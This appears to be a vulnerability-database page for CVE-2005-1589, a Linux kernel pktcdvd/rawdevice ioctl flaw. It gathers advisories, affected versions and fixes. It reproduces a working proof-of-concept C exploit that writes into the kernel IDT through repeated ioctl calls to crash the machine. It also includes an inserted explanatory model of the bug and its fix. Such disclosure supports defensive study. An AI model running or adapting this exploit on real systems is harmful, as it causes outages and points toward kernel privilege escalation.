CVE-2005-1589
CVSS 7.2
Published: 2005-05-17 00:00:00
Revised: 2016-11-18 21:59:23

[Original] The pkt_ioctl function in the pktcdvd block device ioctl handler (pktcdvd.c) in Linux kernel 2.6.12-rc4 and earlier calls the wrong function before passing an ioctl to the block device, which crosses security boundaries by making kernel address space accessible from user space and allows local users to cause a denial of service and possibly execute arbitrary code, a similar vulnerability to CVE-2005-1264.


[CNNVD] Linux Kernel IOCTL Handler Multiple Local Memory Corruption Vulnerabilities (CNNVD-200505-1085)

        Linux Kernel is the kernel used by the open-source operating system Linux.
        A vulnerability exists in the pktcdvd and rawdevice block device components of the Linux kernel; a local attacker may exploit it to elevate privileges.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1589
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1589
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1085
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0045.html
(VENDOR_ADVISORY)  VULNWATCH  20050516 Linux kernel pktcdvd and rawdevice ioctl break user space limit vulnerability
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0046.html
(UNKNOWN)  VULNWATCH  20050517 Re: Linux kernel pktcdvd and rawdevice ioctl break user space limit vulnerability
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0047.html
(UNKNOWN)  VULNWATCH  20050517 Linux kernel pktcdvd ioctl break user space limit vulnerability [corrected]
http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.11.10
(UNKNOWN)  CONFIRM  http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.11.10
http://marc.info/?l=linux-kernel&m=111630531515901&w=2
(UNKNOWN)  MLIST  [linux-kernel] 20050517 [PATCH] Fix root hole in pktcdvd
http://www.securityfocus.com/bid/13651
(UNKNOWN)  BID  13651
http://www.vupen.com/english/advisories/2005/0557
(UNKNOWN)  VUPEN  ADV-2005-0557

- Vulnerability information

Linux Kernel IOCTL Handler Multiple Local Memory Corruption Vulnerabilities
High  Design Error
2005-05-17 00:00:00 2005-10-25 00:00:00
Local
        Linux Kernel is the kernel used by the open-source operating system Linux.
        A vulnerability exists in the pktcdvd and rawdevice block device components of the Linux kernel; a local attacker may exploit it to elevate privileges.

- Advisories and patches

        No data available

- Vulnerability information (998)

Linux Kernel <= 2.6.12-rc4 (ioctl_by_bdev) Local Denial of Service Exploit (EDBID:998)
linux dos
2005-05-17 Verified
0 alert7
N/A
/* pktcdvd_dos.c proof-of-concept
 * This is only a lame POC which will crash the machine, no root shell here.
 *                      --- alert7
 *                      2005-5-15
 * the vulnerability in 2.6 up to and including 2.6.12-rc4
 *
 * gcc -o pktcdvd_dos pktcdvd_dos.c
 *
 * NOTE: require user can read pktcdvd block device
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <paths.h>
#include <grp.h>
#include <setjmp.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ucontext.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <asm/page.h>
#include <asm/segment.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/sysctl.h>
#include <linux/cdrom.h>

#define __NR_sys_ioctl __NR_ioctl

#define PKTCDVDDEVICE "/dev/hdc"

static inline _syscall3(int, sys_ioctl, int, fd, int, cmd, unsigned long, arg);

struct idtr {
    unsigned short limit;
    unsigned int base;
} __attribute__ ((packed));

unsigned int get_addr_idt() {
    struct idtr idtr;
    asm("sidt %0" : "=m" (idtr));
    return idtr.base;
}

struct desc_struct {
    unsigned long a, b;
};

int main(int argc, char **argv)
{
    unsigned int ptr_idt;
    int iret;
    int fd;

    printf("[++]user stack addr %p \n", &ptr_idt);
    if ((((unsigned long)&ptr_idt) >> 24) == 0xfe) {
        printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n");
        return -1;
    }

    ptr_idt = get_addr_idt();
    printf("[++]IDT Addr %p \n", ptr_idt);

    fd = open(PKTCDVDDEVICE, O_RDONLY);
    if (fd == -1) {
        printf("[--]");
        fflush(stdout);
        perror("open");
        return -1;
    }

    unsigned long WriteTo;

    if ((ptr_idt >> 24) == 0xc0) {
        printf("[++]this OS in Real Linux\n");
        WriteTo = ptr_idt;
    } else {
        printf("[++]this OS maybe in VMWARE\n");
        WriteTo = 0xc0100000;
    }

    printf("[++]call sys_ioctl will crash machine\n");
    fflush(stdout);

    int loopi;
    for (loopi = 0; loopi < 0x100000; loopi++) {
        printf("[++]will write data at 0x%x\n", WriteTo + loopi * 4);
        fflush(stdout);
        iret = sys_ioctl(fd,
                         CDROM_LAST_WRITTEN,
                         WriteTo + loopi * 4);
        if (iret == -1) {
            printf("[--]");
            fflush(stdout);
            perror("ioctl");
            // if in VMWARE, rewriting the ptr_idt address will fail
            printf("[--]still aliving\n");
            close(fd);
            return -1;
        }
    }
    close(fd);
    return 0;
}

// milw0rm.com [2005-05-17]

- Vulnerability information (F39272)

lk26.txt (PacketStormID:F39272)
2005-08-14 00:00:00
alert7
exploit,denial of service,arbitrary,kernel,local,root,proof of concept
linux
CVE-2005-1589

Two locally exploitable flaws have been found in the Linux rawdevice and pktcdvd block device ioctl handlers that allow local users to gain root privileges and execute arbitrary code at kernel privilege level. Proof of concept denial of service exploit included.

Synopsis:  Linux kernel pktcdvd and rawdevice ioctl break user space limit vulnerability
Product:   Linux kernel
Version:   2.6 up to and including 2.6.12-rc4
Vendor:    http://www.kernel.org/
URL:       
CVE:       CAN-2005-1589
Severity:  local(7)
Date:      May 16, 2005


Issue:
======

Two locally exploitable flaws have been found in the Linux rawdevice and
pktcdvd block device ioctl handlers that allow local users to gain root
privileges and execute arbitrary code at kernel privilege level.


Details:
========

The Linux kernel contains pktcdvd and rawdevice block device components.
Because the pktcdvd and rawdevice ioctl handlers do not check the argument
they receive from user space, a process can break the user space limit and
execute arbitrary code at kernel privilege level.


Discussion:
=============

The vulnerable code resides in drivers/block/pktcdvd.c in your preferred
version of the Linux kernel source tree:

static int pkt_ioctl(struct inode *inode, struct file *file, unsigned 
					int cmd, unsigned long arg)
{
	struct pktcdvd_device *pd = inode->i_bdev->bd_disk->private_data;

	VPRINTK("pkt_ioctl: cmd %x, dev %d:%d\n", cmd, imajor(inode), 
							iminor(inode));
	BUG_ON(!pd);

	switch (cmd) {
	/*
	 * forward selected CDROM ioctls to CD-ROM, for UDF
	 */
	case CDROMMULTISESSION:
	case CDROMREADTOCENTRY:
	case CDROM_LAST_WRITTEN:
	case CDROM_SEND_PACKET:
	case SCSI_IOCTL_SEND_COMMAND:
[*]		return ioctl_by_bdev(pd->bdev, cmd, arg);

	case CDROMEJECT:
		/*
		 * The door gets locked when the device is opened, so we
		 * have to unlock it or else the eject command fails.
		 */
		pkt_lock_door(pd, 0);
[*]		return ioctl_by_bdev(pd->bdev, cmd, arg);

	default:

As can be seen at [*], the arg value supplied to the ioctl_by_bdev()
function is not checked, so a user can pass an arg greater than TASK_SIZE.


fs/block_dev.c
int ioctl_by_bdev(struct block_device *bdev, unsigned cmd, unsigned long arg)
{
	int res;
	mm_segment_t old_fs = get_fs();
[**]	set_fs(KERNEL_DS);
	res = blkdev_ioctl(bdev->bd_inode, NULL, cmd, arg);
	set_fs(old_fs);
	return res;
}

However, in order to also support callers that pass kernel-space parameters,
ioctl_by_bdev() calls set_fs(KERNEL_DS) at [**], which allows the ioctl to
access parameters in kernel space. So if the arg passed to ioctl_by_bdev() is
greater than TASK_SIZE, the process breaks the user space limit and can
overwrite kernel space data. A local user can thus execute arbitrary code at
kernel privilege level.

Exploitation requires that the user can read the block device.


Rawdevice is similar to the above:

drivers/char/raw.c
static int
raw_ioctl(struct inode *inode, struct file *filp,
		  unsigned int command, unsigned long arg)
{
	struct block_device *bdev = filp->private_data;

[*]	return ioctl_by_bdev(bdev, command, arg);
}
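To make the mechanism above concrete, the following is an added user-space model (not kernel code, and not part of alert7's advisory) of the addr_limit check that set_fs() manipulates. It models a 32-bit x86 kernel with the 3G/1G split (TASK_SIZE = 0xC0000000), a stand-in CDROM_LAST_WRITTEN handler that stores one long through the user pointer, and the two forwarding paths: ioctl_by_bdev(), which widens the limit to KERNEL_DS around the call, and a direct blkdev_ioctl() call that leaves the caller's USER_DS limit in place, which is how the 2.6.11.10 fix referenced on this page closes the hole for pkt_ioctl() and raw_ioctl(). All addresses and the "write" itself are constructed; the functions return 0 or -EFAULT exactly as the real access_ok() decision would.

```c
/* Model of why set_fs(KERNEL_DS) in ioctl_by_bdev() turns an unchecked
 * ioctl argument into a kernel-space write.  Added illustration; not kernel
 * code.  Constants model 32-bit x86 with TASK_SIZE = 0xC0000000. */
#include <errno.h>
#include <stdio.h>

#define TASK_SIZE 0xC0000000UL

typedef struct { unsigned long seg; } mm_segment_t;   /* thread addr_limit */
static const mm_segment_t USER_DS   = { TASK_SIZE };  /* normal syscall limit */
static const mm_segment_t KERNEL_DS = { ~0UL };       /* "no limit" for in-kernel callers */

static mm_segment_t current_addr_limit = { TASK_SIZE };
static mm_segment_t get_fs(void) { return current_addr_limit; }
static void set_fs(mm_segment_t s) { current_addr_limit = s; }

/* Simplified __range_ok(): [addr, addr+size) must lie below addr_limit. */
static int access_ok(unsigned long addr, unsigned long size)
{
    return addr + size >= addr && addr + size <= current_addr_limit.seg;
}

/* Where the last modelled store landed (for inspection only). */
static unsigned long last_store_addr;

/* Stand-in for the CDROM_LAST_WRITTEN handler: put_user(value, (long *)arg). */
static int cdrom_last_written(unsigned long arg)
{
    if (!access_ok(arg, sizeof(long)))
        return -EFAULT;
    last_store_addr = arg;   /* the real kernel writes the sector count here */
    return 0;
}

/* blkdev_ioctl() model: dispatches with the caller's addr_limit untouched. */
static int blkdev_ioctl_model(unsigned long arg)
{
    return cdrom_last_written(arg);
}

/* ioctl_by_bdev() as quoted in the advisory: widens the limit to KERNEL_DS
 * so in-kernel callers can pass kernel pointers.  Forwarding a raw
 * user-supplied arg through it is the vulnerable pattern. */
static int ioctl_by_bdev_model(unsigned long arg)
{
    mm_segment_t old_fs = get_fs();
    set_fs(KERNEL_DS);
    int res = blkdev_ioctl_model(arg);
    set_fs(old_fs);
    return res;
}

/* Vulnerable forwarding: pkt_ioctl()/raw_ioctl() before the fix. */
static int pkt_ioctl_vulnerable(unsigned long arg)
{
    return ioctl_by_bdev_model(arg);
}

/* Fixed forwarding: call blkdev_ioctl() directly so access_ok() still
 * rejects any address at or above TASK_SIZE. */
static int pkt_ioctl_fixed(unsigned long arg)
{
    return blkdev_ioctl_model(arg);
}

int main(void)
{
    unsigned long user_ptr   = 0xBFFF0000UL;  /* constructed user-space address */
    unsigned long kernel_ptr = 0xC0100000UL;  /* constructed kernel-space address */

    set_fs(USER_DS);   /* a syscall always starts with the user limit */
    printf("vulnerable, user ptr:   %d\n", pkt_ioctl_vulnerable(user_ptr));
    printf("vulnerable, kernel ptr: %d  (0 = write to kernel memory allowed)\n",
           pkt_ioctl_vulnerable(kernel_ptr));
    printf("fixed, user ptr:        %d\n", pkt_ioctl_fixed(user_ptr));
    printf("fixed, kernel ptr:      %d  (-EFAULT = rejected)\n",
           pkt_ioctl_fixed(kernel_ptr));
    printf("last modelled store at 0x%lx\n", last_store_addr);
    return 0;
}
```

The point to take from the model is that the check itself is never bypassed: access_ok() runs in both paths, but under KERNEL_DS its limit is the whole address space, so the user-controlled pointer passes. Any driver that forwards a user ioctl argument through a KERNEL_DS wrapper reproduces the same defect, which is why the remedy is to call the block-device ioctl with the caller's limit intact rather than to add a check inside the wrapper.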



CREDIT:
========

alert7 ( wangwei@ssr.cn , alert7@xfocus.org ) discovered this vulnerability
Special thanks to ssr and xfocus guys:P



DISCLAIMER:
========
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. 

ZHONGHANGJIAXIN INFORMATION TECHNOLOGY CO.,LTD (http://www.ssr.cn)
Copyright 2003-2005 ZHONGHANGJIAXIN. All Rights Reserved. Terms of use.



Appendix:
=========

(The pktcdvd_dos.c proof of concept attached to this advisory is identical to the EDB-ID 998 listing reproduced earlier on this page and is not repeated here.)


---------------THE END---------------

- Vulnerability information

16608
Linux Kernel pktcdvd Device ioctl_by_bdev() Function Kernel Memory Corruption
Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

2005-05-16 Unknown
2005-05-17 Unknown

- Solution

Upgrade to version 2.6.11.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Linux Kernel IOCTL Handlers Local Memory Corruption Vulnerabilities
Design Error 13651
No Yes
2005-05-17 12:00:00 2009-07-12 02:56:00
alert7 <wangwei@ssr.cn> is credited with the discovery of this issue.

- Affected program versions

Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core3
Red Hat Enterprise Linux AS 4
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
+ Red Hat Fedora Core4
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
+ Red Hat Fedora Core3
+ Red Hat Fedora Core2
+ Trustix Secure Linux 3.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Conectiva Linux 10.0

- Vulnerability discussion

The Linux kernel raw device and pktcdvd block device ioctl handlers are reported prone to local kernel-based memory corruption vulnerabilities. The issues manifest due to a lack of sanity checks performed on argument values that are passed to the 'raw_ioctl()' and 'pkt_ioctl()' functions.

A local attacker that has read access to an affected block device may leverage this memory corruption to execute arbitrary attacker-supplied code in the context of the system kernel (ring-0).

- Exploit

The following denial of service proof of concept is available:

- Solution

Red Hat has released advisory RHSA-2005:420-22 and fixes to address this issue and another issue on Red Hat Linux Enterprise platforms. Customers that are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Ubuntu Linux has released advisory USN-131-1 to address this, and other issues. Please see the referenced advisory for further information.

RedHat Fedora Linux has released advisory FEDORA-2005-392 addressing this issue for Fedora Core 3. Please see the referenced advisory for details on obtaining and applying the appropriate updates.

Mandriva Linux has released advisory MDKSA-2005:110 addressing this issue. Please see the referenced advisory for further information.

Red Hat has released an updated advisory RHSA-2005:420-24 to address various issues affecting the kernel. Please see the advisory in Web references for more information.

Conectiva Linux has released security advisory CLSA-2005:999 addressing this and other issues. Please see the referenced advisory for details on obtaining and applying the appropriate updates.

Mandriva has released advisory MDKSA-2005:219 to address various issues affecting the Linux Kernel in Mandrake Linux 10.1. Please see the referenced advisory for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


Linux kernel 2.6.10
